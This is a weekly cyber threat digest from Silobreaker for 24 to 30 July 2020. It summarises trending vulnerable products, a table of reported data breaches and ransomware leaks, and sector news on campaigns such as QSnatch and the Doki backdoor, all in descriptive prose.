Threat Reports / Weekly Threat Reports

Threat Summary: 24 – 30 July 2020

24 – 30 July 2020

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Trending Vulnerable Products

Open Source
Name Heat 7d
CentOS Web Panel

Gentoo Linux

OKCupid

Cisco FirePOWER

Netgear R6700
Deep & Dark Web
Name Heat 7d
Roblox

Windows Powershell

Apple iOS

iPhone

Jenkins Server

The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.

Data Leaks & Breaches
Company Information Affected
CouchSurfing (US) A database containing the details of 17 million users is currently being sold for $700 on hacking forums and Telegram channels. Allegedly stolen in July 2020, user details within the database include user IDs, real names, and email addresses. It is unclear if the leak contains passwords. 17,000,000
Invest Bank (United Arab Emirates) An actor on a dark web forum claims to have successfully breached the bank and stolen its database, with the structure and contents verified by Cyble researchers. The database is 7.5GB in size, and contains 29 database tables that contain bank account details, card data, user records, and more. Unknown
Hurb (Brazil) The online travel agency suffered a data breach resulting in 20 million leaked user records. Exposed data includes email addresses and hashed passwords, based on samples posted to dark web forums. Unknown
Promo.com (US) The company suffered a data breach as a result of a vulnerability in a third-party service. The breach exposed 23 million records of Slidely and Promo user data, including first and last names, email addresses, IP addresses, approximated user location based on the IP addresses, and gender. Encrypted, hashed and salted passwords, were also exposed and may have been decoded. Unknown
Amphastar Pharmaceuticals (US) Around 2GB of data was leaked in what appears to be the result of a DoppelPaymer ransomware compromise. The compromised data includes audit reports, accounting documents, chemical product research, confidential corporate agreements and more. Unknown
Instacart (US) Sellers in two dark web stores are advertising 278,531 customer accounts. Data includes names, order histories, the last four digits of credit card numbers, email addresses, and more. Instacart stated they are not aware of a data breach, suggesting accounts may have been comrpomised outside the platform. 278,531
Salinas Valley Memorial Healthcare Systems (US) Four employee email accounts and one relating to a contractor were breached between April and June 2020. The intruder accessed the inboxes for a few hours and was able to view employee and patient data. The exposed information included names, medical record numbers, hospital account numbers, and more. Unknown
Dave Inc (US) The company disclosed a security incident, caused by a breach at former third-party service provider Waydev, which exposed 7,516,691 user records. The database was sold for roughly $16,000 in a private underground sale on July 14th, 2020, before being freely shared by ShinyHunters on a hacking forum on July 24th, 2020. Exposed data includes 3,092,396 email addresses, names, phone numbers, hashed passwords, and more. ~3,000,000
Axens SA (France) On their data leaks blog site, the operators of Netwalker ransomware claim to have attacked the French engineering company Axens SA. A leaked sample of data supposedly belonging to the company appears to contain project documents, client details, financial documents, and more. Unknown
Administrador de Infraestructuras Ferroviarias (Spain) The company was targeted in a REvil ransomware attack, with the operators of the ransomware claiming to have stolen 800 GB of data. This reportedly includes contracts and accounting information. The attackers published a sample of the data and threatened to publish more. The attack did not impact ADIF’s infrastructure. Unknown
SEI Investments (US) The company’s vendor M.J. Brunner was targeted in a ransomware attack in May 2020, in which the attackers stole files pertaining to about 100 SEI Investments’ clients. The data was subsequently leaked online. Exposed data includes usernames and emails, and in some cases physical addresses and phone numbers. Unknown
National Cardiovascular Partners (US) On May 19th, 2020, the company became aware of a breach of one of its employee email accounts that contained patient information. An investigation revealed that the attacker had first gained access on April 27th, 2020. Exposed data included names, contact information, and other sensitive data. 78,070
Rabot Dutilleul (France) The operators of Netwalker ransomware claim to have targeted Rabot Dutilleul and stolen sensitive company data. A data sample was leaked which contains non-disclosure agreements, construction material data, multiple client services documents, and more. Unknown
Dussmann Group (Germany) Nefilim ransomware operators published ‘Part 1’ of a data leak containing sensitive data they claim to have stolen from the company. The company has since confirmed that an attack againts its subsidiary Dresdner Kühlanlagenbau GmbH took place. The ransomware operators have published 14GB worth of stolen files, which contain documents, images, accounting information, and AutoCAD drawings. Unknown
Square Yards (India) A credible actor, using the alias ‘South Korea,’ claims to have breached Square Yards. Breached data includes full names of customers, addresses, dates of birth, emails, and more, as well as employee data including full names, email IDs, passwords, mobile numbers, and addresses. Unknown
SumoPayroll (India) Hacker ‘South Korea’ advertised data belonging to SumoPayroll on the dark web. This included employee names, PAN cards, Aadhaar cards, and bank details. Unknown
Stashfin (India) A Stashfin database containing settlement documents, Aadhaar cards, PAN cards, legal documents, and salary slips was being advertised on the dark web by hacker ‘South Korea.’ Unknown
Waydev (US) The analytics platform Waydev revealed that it discovered that hackers gained access to its database by using a blind SQL injection flaw on July 3rd, 2020. The attackers stole GitHub and GitLab OAuth tokens, which they used to access the codebases of other companies, including Dave.com and Flood.io. Unknown
Front Rush (US) The company confirmed a data breach after a publicly accessible AWS S3 bucket was discovered by a security researcher in January 2020. An investigation revealed that the database was exposed from January 18th, 2016 to January 8th, 2020. The database contained over 700,000 files, including medical records, performance reports, and driver’s licenses, names, dates of birth, Social Security numbers, and more. Unknown
Drizly (US) The company informed its customers of a data breach in which email addresses, dates of birth, hashed passwords, and in some cases delivery addresses, were stolen. TechCrunch analysed a portion of the data and found that it also contained user phone numbers, IP addresses, and geolocation data. In addition, a listing on a dark web marketplace claims that the data includes financial information. 2,500,000
Multiple Companies Since July 21st, 2020, a threat actor operating under the alias ShinyHunters has freely leaked 18 databases onto a hacker forum, nine of which have not been previously reported on. These databases allegedly belong to Havenly, Indaba Music, Ivoy, Proctoru, Rewards1, Scentbird, and Vakinha. In total, the 18 databases contain 386 million user records. Unknown
Avon (US) Safety Detectives discovered an unprotected Avon.com US server, which contained sensitive company data. On June 9th, 2020, the company had confirmed a cyber incident, yet it remains unclear whether this breach is related to that incident. The server has since been secured. Leaked files included API logs, as well as personally identifiable information, including full names, phone numbers, dates of birth, email addresses, and physical addresses. Unknown
Ledger SAS (US) The company became aware of a breach on the Ledger website on July 14th, 2020 and later discoverd that an unauthorised individual also accessed its e-commerce and marketing database on June 25th, 2020. The database contained contact and order details, including roughly 1 million email addresses. About 9,500 customers also had their first and last names, postal addresses, phone numbers, and ordered products exposed. Payment information, credentials and crypto funds were not affected. ~1,000,000
Vermont Department of Taxes (US) On July 2nd, 2020, the department discovered that the information of taxpayers had been exposed on its online filing site. The breach impacted Vermont residents who filed property tax transfer returns on the site between February 2017 and July 2020. Exposed data included the full Social Security numbers of buyers, and partial Social Security numbers of sellers. Unknown

This table shows a selection of leaks and breaches reported this week.

Attack Types Mentioned in Critical Infrastructure

This chart shows the trending Attack Types related to Critical Infrastructure over the last week.

Weekly Industry View
Industry Information
Critical Infrastructure Researchers at McAfee identified a campaign using malicious documents containing job postings taken from defence contractors. The campaign was first spotted in 2020 and appears to target senior industry figures in the aerospace and defence sector. The campaign targets South Korea and other foreign nations with malicious documents that use template injection attacks to install data gathering malware on target systems. The documents typically involved defence industry lures, but in some cases used domestic South Korean politics as a lure. The researchers stated that the TTPs used in the campaign are ‘very similar’ to those seen in two other campaigns in 2017 and 2019 that have been attributed to North Korea-linked actors Hidden Cobra.
Education Researchers at Cyble stated that they identified a credible threat actor who is selling source code of the CengageNow iLrn application for roughly $1000. The code appears to contain all the resources and programming configuration of the application.
Technology The UK’s National Cyber Security Centre and the US Cybersecurity and Infrastructure Security Agency warned of the risk that QSnatch malware poses to unpatched QNAP NAS devices. The malware was used in a campaign from early 2014 to mid-2017 and again in late 2018 to late 2019. The infection vector has not been definitively identified, but the malware ‘appears to be injected into the device firmware during the infection stage’. Once a device is infected, the malware can prevent administrators from running firmware updates. QSnatch, which by mid-June 2020 had infected roughly 62,000 devices worldwide, can log passwords, scrape credentials, use web shell functionality for remote access, and more.
Retail, Hospitality & Tourism BuzzFeed reported that sellers in two dark web stores are advertising 278,531 Instacart customer accounts. One of the sellers claims to have been adding freshly compromised accounts throughout June and July 2020. The information includes names, order histories, the last four digits of credit card numbers, email addresses, and more. The data was being sold for roughly $2 per account. The head of Security Fanatics informed BuzzFeed that the data appears to be ‘recent and totally legit’. Instacart told BuzzFeed that they ‘are not aware of any data breach at this time.’ The company stated the customer accounts could have been compromised via credential stuffing or phishing attacks which occurred outside the platform.
Cryptocurrency Intezer researchers observed a new attack as part of the ongoing Ngrok Botnet campaign targeting misconfigured Docker API ports in the cloud that involved the use of a new Linux backdoor called Doki. The malware uses the DynDNS service and a unique Domain Generation Algorithm, abusing the Dogecoin cryptocurrency blockchain to dynamically generate its C2 domain address. It has remained undetected for over six months. The researchers warn that misconfigured Docker servers tend to become infected within a few hours of being exposed.

News and information concerning each mentioned industry over the last week.

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.
The Silobreaker Team

More News

  • COVID-19 Alert – 03 August 2020

    Silobreaker's Daily COVID-19 Alert for 03 August 2020
  • Cyber Alert – 03 August 2020

    Cyber Alert: InfoSecHotSpot - 10 billion records exposed in unsecured databases, study says The databases contain personal information that could… https://t.co/LYBl2kpNgL...
  • COVID-19 Alert – 02 August 2020

    Silobreaker's Daily COVID-19 Alert for 02 August 2020
View all News

Request a demo

Get in touch